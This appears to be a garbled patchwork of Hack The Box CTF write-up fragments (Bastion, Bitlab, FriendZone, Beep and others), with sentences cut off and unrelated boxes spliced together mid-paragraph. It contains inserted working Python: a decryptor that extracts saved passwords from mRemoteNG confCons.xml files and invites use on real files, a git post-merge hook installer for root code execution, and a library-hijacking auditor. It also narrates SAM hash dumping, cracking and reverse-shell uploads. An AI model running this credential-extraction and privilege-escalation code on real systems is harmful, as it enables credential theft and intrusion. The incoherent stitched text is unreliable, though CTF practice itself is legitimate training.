After reading various write-ups and guides online, I was able to root this machine! Using nmap we are able to determine the open ports and running services on the machine.
Not much can be done with the SSH service as we do not have any credentials on hand, so let's come back to it later. As for the SMB service, maybe we can try logging into it and see what we can find? Alright, the Backups share seems interesting. Let's check it out.
Looks like someone left a note. At this point I did not understand the meaning of this message, so I simply ignored it. Another thing that caught my attention was the WindowsImageBackup directory. Oh no, this feels like a rabbit hole already, but Backup seems hopeful.
Let's try downloading them. What just happened? Was the file too big to be transferred? This was where I finally understood the note when it said not to transfer the entire backup file because the VPN to the subsidiary office is too slow. After downloading the. Seems like a rather normal-looking Windows file system. Maybe we can dump out the passwords using these files? Using the samdump2 command, we were able to extract the account hashes. Following up, we used john to crack the NT hashes in hash.
Bingo, we got it! The user. As l4mpje we first checked out the installed programs. Let's see what version of mRemoteNG is installed by checking the Changelog. Seems like the version is 1. Let's see if we can find any exploits regarding mRemoteNG. Since I did not have a Meterpreter session on the machine, I found another alternative.

Hack The Box - Bastion (tags: hackthebox, smb, mremoteng, windows, ssh; Sep 7)
After setting up the Commando VM, I attempted to access the share and it worked!

September 07

Bastion was an easy box where we had to find an open SMB share that contained a Windows backup. We then find an mRemoteNG configuration file that contains encrypted credentials for the administrator. The system flag blood was still up for grabs when I reached that stage, so instead of reversing the encryption of the configuration file I just installed the mRemoteNG application on a Windows VM, copied the config file over, and was able to log in as administrator.
OpenSSH is running on the Windows machine. As this is not a standard Windows service, I make a note of it, as it might be needed to log in later when we find credentials. The note. The backup directory contains two. I use the vhdimount utility to mount the remote. I do some recon and find that the mRemoteNG application is installed on the system. It supports saving credentials locally in a configuration file. I immediately see that it contains an RDP session configuration for the user Administrator:
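As an added example that is neither the author's code nor something the write-up did, here is what "reversing the encryption" of that configuration file amounts to for the confCons.xml layout used by mRemoteNG 1.75 and newer: each Password attribute is Base64 of salt(16) || nonce(16) || AES-256-GCM ciphertext || tag(16); the key is PBKDF2-HMAC-SHA1 of the master password (mR3m when the user never set one) with that salt and the file's KdfIterations count; and the salt is also the GCM associated data. That GCM layout is why a CBC-only decryption script does not apply. The code uses the cryptography package, falling back to pycryptodome. The sample confCons.xml, its host, user name and password are constructed here and are not the box's real values.

```python
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

try:  # prefer the `cryptography` package; fall back to pycryptodome
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _gcm_open(key, nonce, ct_and_tag, aad):
        return AESGCM(key).decrypt(nonce, ct_and_tag, aad)

    def _gcm_seal(key, nonce, plaintext, aad):
        return AESGCM(key).encrypt(nonce, plaintext, aad)
except ImportError:
    from Crypto.Cipher import AES

    def _gcm_open(key, nonce, ct_and_tag, aad):
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        return cipher.decrypt_and_verify(ct_and_tag[:-16], ct_and_tag[-16:])

    def _gcm_seal(key, nonce, plaintext, aad):
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        ciphertext, tag = cipher.encrypt_and_digest(plaintext)
        return ciphertext + tag

DEFAULT_MASTER_PASSWORD = "mR3m"  # mRemoteNG's built-in master password when the user set none


def decrypt_password(blob_b64, master_password=DEFAULT_MASTER_PASSWORD, iterations=1000):
    """Blob layout: salt(16) || nonce(16) || AES-256-GCM ciphertext || tag(16), Base64-encoded.
    Key = PBKDF2-HMAC-SHA1(master_password, salt, KdfIterations, 32 bytes); AAD = salt."""
    blob = base64.b64decode(blob_b64)
    if len(blob) < 48:
        raise ValueError("too short for salt + nonce + tag")
    salt, nonce, ct_and_tag = blob[:16], blob[16:32], blob[32:]
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, iterations, dklen=32)
    return _gcm_open(key, nonce, ct_and_tag, salt).decode("utf-8")


def encrypt_password(plaintext, master_password=DEFAULT_MASTER_PASSWORD, iterations=1000):
    """Inverse of decrypt_password; used here only to build the constructed sample below."""
    salt, nonce = os.urandom(16), os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, iterations, dklen=32)
    sealed = _gcm_seal(key, nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + sealed).decode("ascii")


def extract_credentials(confcons_xml, master_password=DEFAULT_MASTER_PASSWORD):
    """Walk every <Node> of a confCons.xml; returns (name, host, protocol, user, password)
    tuples, with password None when the GCM tag check fails (wrong master password)."""
    if isinstance(confcons_xml, str):
        confcons_xml = confcons_xml.encode("utf-8")
    root = ET.fromstring(confcons_xml)
    iterations = int(root.get("KdfIterations", "1000"))
    creds = []
    for node in root.iter("Node"):
        enc = node.get("Password") or ""
        if not enc:
            continue
        try:
            password = decrypt_password(enc, master_password, iterations)
        except Exception:  # InvalidTag / ValueError: master password does not match
            password = None
        creds.append((node.get("Name"), node.get("Hostname"), node.get("Protocol"),
                      node.get("Username"), password))
    return creds


# Constructed confCons.xml in the 1.75+ layout; host, user and password are made up.
_SAMPLE_BLOB = encrypt_password("S3cr3tPass")
SAMPLE_CONFCONS = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections Name="Connections" EncryptionEngine="AES" BlockCipherMode="GCM"
  KdfIterations="1000" ConfVersion="2.6" xmlns:mrng="http://mremoteng.org">
  <Node Name="DC" Type="Connection" Hostname="192.0.2.10" Protocol="RDP"
    Username="Administrator" Password="{_SAMPLE_BLOB}" />
</mrng:Connections>
"""

if __name__ == "__main__":
    for name, host, proto, user, password in extract_credentials(SAMPLE_CONFCONS):
        print(f"{name}: {proto}://{user}:{password}@{host}")
```

Point it at a real confCons.xml with extract_credentials(open(path, "rb").read()); if every password comes back None, the user set a custom master password and you need that instead of mR3m.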
Because I was under time pressure to get the system flag, I decided to spin up a Windows VM and install mRemoteNG instead of trying to find a way to recover the password. I found a Ruby script on Packet Storm that decrypts the password, but it only works for CBC mode and therefore was of no use to me here. I installed the mRemoteNG portable edition, then replaced the confCons.

The home page is redirected to the sign-in page.
The bottom has two links of interest: Explore and Help. The Explore link brings us to the Projects page, where we can see current projects, groups and snippets. All links except Gitlab Login point to external sites.
To find out what the variable contains, we can use the developer console. The easiest way to use these credentials is to bookmark the link (right-click on the link). Now go back to the login page and select the bookmarked link: the credentials are populated into the sign-in form. How convenient. Of course, we can also simply type in the credentials ourselves.
Bitlab – HackTheBox writeup
Now click on Sign In and we are signed in to the application. This GitLab allows us to maintain our projects. Essentially, we can upload any files to the project. This will use the ip-address. Sure enough, we are able to perform git pull. So I do some research on Google and find a feature called git hooks. A couple of good reads can be found at:

For git pull, post-merge hook scripts can be used; they are triggered when a merge occurs.
To achieve that, we will create a local copy of the project Profile, then make some changes and perform a merge. Finally, doing a sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy (under .git/hooks), which then runs as root.
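The procedure above, as an added example that is not from the write-up: install_post_merge_hook() writes a post-merge hook into a repository's .git/hooks directory and sets the execute bit (Git silently skips hooks without it), and demo_with_git() reproduces the whole chain with two throwaway repositories, using plain git pull where the target needs sudo git pull. The hook body here only records which user ran it; the repository names, the marker file and the script contents are this example's own.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Constructed hook body. Git runs post-merge from the top of the working tree after every
# successful merge, which includes a fast-forward `git pull`; under `sudo git pull` that is root.
HOOK_SCRIPT = """#!/bin/sh
id > hook_ran_as.txt
"""


def install_post_merge_hook(repo_dir, script=HOOK_SCRIPT):
    """Write .git/hooks/post-merge and set the execute bit; returns the hook path."""
    hooks_dir = os.path.join(repo_dir, ".git", "hooks")
    os.makedirs(hooks_dir, exist_ok=True)
    path = os.path.join(hooks_dir, "post-merge")
    with open(path, "w") as fh:
        fh.write(script)
    # A hook without +x is ignored: the usual reason "sudo git pull did nothing".
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def is_active_hook(path):
    """True when Git would actually run this hook: file exists, is executable, has a shebang."""
    if not os.path.isfile(path) or not os.access(path, os.X_OK):
        return False
    with open(path) as fh:
        return fh.read(2) == "#!"


def demo_install():
    """Create a throwaway repo skeleton and install the hook into it; returns the hook path."""
    repo = tempfile.mkdtemp(prefix="hookdemo_")
    os.mkdir(os.path.join(repo, ".git"))
    return install_post_merge_hook(repo)


def _git(*args, cwd):
    cmd = ["git", "-c", "user.name=demo", "-c", "user.email=demo@example.invalid", *args]
    return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True).stdout


def demo_with_git():
    """Upstream repo -> clone with the hook -> new upstream commit -> `git pull` merges and the
    hook fires. Returns the hook's output (the `id` line), or None when git is not installed."""
    if shutil.which("git") is None:
        return None
    with tempfile.TemporaryDirectory() as tmp:
        upstream = os.path.join(tmp, "upstream")  # stands in for the GitLab project
        clone = os.path.join(tmp, "clone")        # stands in for the checkout that root pulls
        os.mkdir(upstream)
        _git("init", "-q", cwd=upstream)
        _git("commit", "-q", "--allow-empty", "-m", "initial", cwd=upstream)
        _git("clone", "-q", upstream, clone, cwd=tmp)
        install_post_merge_hook(clone)
        _git("commit", "-q", "--allow-empty", "-m", "change to be merged", cwd=upstream)
        _git("pull", "-q", cwd=clone)             # `sudo git pull` on the target
        marker = os.path.join(clone, "hook_ran_as.txt")
        return open(marker).read().strip() if os.path.exists(marker) else ""


if __name__ == "__main__":
    print(demo_with_git())
```

On the target the hook must sit in the repository that root actually pulls, and sudo's environment scrubbing does not matter here because hooks are located relative to the repository, not through PATH.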
Privilege Escalation
Vulnerability: sudo git pull
Explanation: a post-merge hook script can be defined to perform code execution as root
Enumeration: nmap -p- -A -T4

The Help page only has a bookmarks page.
Now make it available to the website.

There are quite a few ports open. I started enum4linux on the machine's IP to see if I can find anything interesting. In the development share I found two files named hello. In the general share I found a file named creds.
I decided to move on with my enumeration. So I decided to use the domain name, which is friendzone. I found another domain name, administrator1. If we visit that, we are greeted with a plain and simple login page.
If we use those params we get a random image. The only way to test our theory is to upload a reverse shell to that server and try to include it. We can try these credentials to log in via SSH. I was in the friend account and I think this is where I was supposed to find the user flag.
User
Once I was in, I simply took the flag from the user directory.

Privilege escalation
Since I am in the system, I downloaded the enumeration script from my system and ran it. To download the enumeration script, run a Python HTTP server.
Next I checked the sudo rights, and nothing. Next were the running processes, but nothing in the processes. So I started looking in the directories manually. After around 15 minutes, or maybe more, I finally found something interesting to look at. After looking around and googling a bit I found privilege-escalation-via-python-library-hijacking. According to this I can just edit the imported library, in our case os, and hope it works. First I found the path for the python.

Traverxec was a relatively easy box that involved enumerating and exploiting a less popular webserver, Nostromo.
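Returning to the Python library hijacking step of the FriendZone privilege escalation above: as an added example that is not from the write-up, this check answers the two questions that decide whether the technique works against a script run as root: is the resolved source file of the imported module (os.py in the write-up) writable, and is any writable directory searched before it, where a fake module of the same name would be loaded first. The module name libhelper, the temporary directories and the file mode in demo_report() are this example's own constructed scenario.

```python
import importlib.machinery
import os
import sys
import tempfile


def resolve_source(module_name, path):
    """Path of the .py file that `import module_name` would load from the given search path."""
    spec = importlib.machinery.PathFinder.find_spec(module_name, path)
    if spec is None or not spec.origin or not os.path.isfile(spec.origin):
        return None  # built-in, frozen, or not found on this path
    return os.path.realpath(spec.origin)


def hijack_report(module_name, path=None):
    """Two ways a privileged script's `import module_name` turns into code execution:
    - editable: the resolved source file itself is writable (append a payload to it; this
      is the write-up's case with os.py),
    - shadow_dirs: writable directories searched before the real one, where a fake
      <module_name>.py is picked up first ('' in sys.path means the script's directory)."""
    path = list(sys.path) if path is None else list(path)
    origin = resolve_source(module_name, path)
    real_dir = os.path.dirname(origin) if origin else None
    shadow_dirs = []
    for entry in path:
        d = os.path.realpath(entry or os.getcwd())
        if d == real_dir:
            break  # everything after this is searched too late to matter
        if os.path.isdir(d) and os.access(d, os.W_OK):
            shadow_dirs.append(d)
    return {
        "module": module_name,
        "source": origin,
        "editable": bool(origin) and os.access(origin, os.W_OK),
        "shadow_dirs": shadow_dirs,
    }


def demo_report():
    """Constructed scenario: a world-writable libhelper.py in one directory, plus a writable
    directory searched ahead of it. Returns the report for that constructed search path."""
    lib_dir = tempfile.mkdtemp(prefix="lib_")
    early_dir = tempfile.mkdtemp(prefix="early_")
    mod = os.path.join(lib_dir, "libhelper.py")
    with open(mod, "w") as fh:
        fh.write("def helper():\n    return 'legit'\n")
    os.chmod(mod, 0o666)  # the misconfiguration: anyone can edit the library
    return hijack_report("libhelper", [early_dir, lib_dir])


if __name__ == "__main__":
    for name in ("os", "subprocess", "json"):
        r = hijack_report(name)
        state = "writable" if r["editable"] else "read-only"
        print(r["module"], r["source"], state, r["shadow_dirs"])
```

Run it without arguments to audit os, subprocess and json on the current interpreter's sys.path. os.access() reports everything as writable when run as root, so run the audit as the low-privilege user whose write access actually matters, and against the interpreter the privileged script is executed with, since its sys.path is what counts.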
After I put out a Lame write-up yesterday, it was pointed out that I skipped an access path entirely: distcc. Yet another vulnerable service on this box, which, unlike the Samba exploit, provides a shell as a user, giving the opportunity to look for privesc paths.

HackTheBox - Lazy
It does throw one head-fake with a VSFTPd server that is a vulnerable version, but with the box configured not to allow remote exploitation.
As www-data, I can access the Restic backup agent as root, and exploit that to get both the root flag and a root SSH key.

I recently ran into a challenge where I was given a Java JAR file that I needed to analyze and patch to exploit.
Sniper involved utilizing a relatively obvious file include vulnerability in a web page to get code execution and then a shell. The first privesc was a common credential reuse issue. The second involved poisoning a.

Most of the time, this is managed by the package management system. When you run apt install x, it may do some of this behind the scenes for you.
But there are times when it is really useful to know how to interact with this yourself.

Forest is a great example of that. Then I can take advantage of the permissions and accesses of that user to get DCSync capabilities, allowing me to dump hashes for the administrator user and get a shell as the admin.
Postman was a good mix of easy challenges providing a chance to play with Redis and exploit Webmin. That same password provides access to the Webmin instance, which is running as root, and can be exploited to get a shell.

BankRobber was neat because it required exploiting the same exploit twice. I can overwrite that myself to get a shell.

Scavenger required a ton of enumeration, and I was able to solve it without ever getting a typical shell.
The box is all about enumerating the different sites on the box and using an SQL injection in whois to get them all, and finding one is hacked and a webshell is left behind.
Json involved exploiting a .NET deserialization vulnerability to get initial access, and then going one of three ways to get root. Still, it got patched, and two unintended paths came about as well, and everything turned out ok.
This has now been patched, but I thought it was interesting to see what was configured that allowed this non-admin user to get a shell with PsExec.

AI was a really clever box themed after smart speakers like Echo and Google Home.

Player involved a lot of recon, and pulling together pieces to go down multiple different paths to user and root.
I can use that information to get credentials where I can SSH, but only with a very limited shell. However, I can use an SSH exploit to get code execution that provides limited and partial file read, which leads to more credentials.
Those credentials are good for a Codiad instance running on another of the virtual hosts, which allows me to get a shell as www-data.

Let's start with a TCP scan of the target IP address to determine which ports are open and which services are running on those ports. Okay, so there are a few ports open! There are the standard ports that are common on these boxes, SSH on port 22 and HTTP on port 80, but it also seems that there is a mail server present on this machine, with common mail ports and protocols in use (SMTP, POP3, IMAP etc.), what also seems like a Webmin admin login portal on port, and last but not least, MySQL is also running on the machine.
When we browse to. As default credentials don't seem to work on the login panel and there is nothing of note in the page source code, let's run gobuster on port. After looking at several of these exploits, the 'graph. So this page lists the default FreePBX database configuration, along with usernames and passwords! After logging into FreePBX with the changed password, there was no luck with gaining a foothold via the portal.
We are root! I enjoyed this box as it had multiple avenues for exploitation, via the LFI which I used or via port by utilising a blind payload in the User-Agent field. I think that this box is quite realistic, as I'm sure that the same password is used for multiple accounts of varying permissions, as well as running out-of-date and vulnerable software!

HacktheBox - Beep Writeup
Reconnaissance
1. Enumeration - Port
Browse to. Okay, so this looks a little messy, let's view the page source to make it easier to read!
Foothold - Root via LFI
Logging into Beep via SSH. What did I learn from Beep? Conclusion: thanks for reading! Next up is Box 12 - Granny!

absolomb's security blog

However, I made time for this box as it was not only created by my friend burmat but it also involved software that I heavily used as a sysadmin, which made me more interested. I really enjoyed this box a lot as it took some creative thinking to get the initial shell and required analyzing and writing some Python.
Poison is a pretty straightforward box overall but did include a couple of unique things which made it fun.

Pretty fun and quick box with some creative thinking required for getting the initial shell.
I thought this was a fun quick box. I remember when Heartbleed was all the craze, but I had never actually exploited it before Valentine. The box maker did a good job setting up extracting sensitive information out of memory via the vulnerability and giving us a nice simulation of

I liked Aragog simply because it had me do a few new things for initial access and root.
Overall not super difficult but still fun.
This writeup is from a few months ago. Tally is enumeration galore, full of red herrings, distractions, and rabbit holes. I spent hours digging through files and directories on this one. Tally will test your patience but it felt like a very realistic box so I enjoyed it. An interesting exploit at the end as well.
This one was a bit of a doozy but pretty well done and required some pretty thorough enumeration. Kudos to the box creator on the creative setup!

Sense is kind of a mixed box for me. I also wrote up a Python script to fully automate the exploitation once you have valid credentials, see at

This is probably one of the best boxes released on HTB thus far. Each step felt like a treasure hunt; I also really enjoyed getting more familiar with MongoDB.
Do yourself a favor and go do this box!

Mantis takes a lot of patience and a good bit of enumeration. The final exploit is also pretty cool as I had never done anything like it before. Really happy to see a domain controller finally pop up in HackTheBox.
This is probably the first hard box that I actually enjoyed on HackTheBox. Most of the things clicked and I was able to get through much of it fairly quickly overall. Highly recommend this one.

I did this box quite some time ago as it was one of the first ones I did when first starting HackTheBox. I recently helped out someone who was working on this box so I decided to reorganize my notes, as they were somewhat of a mess, and restructure them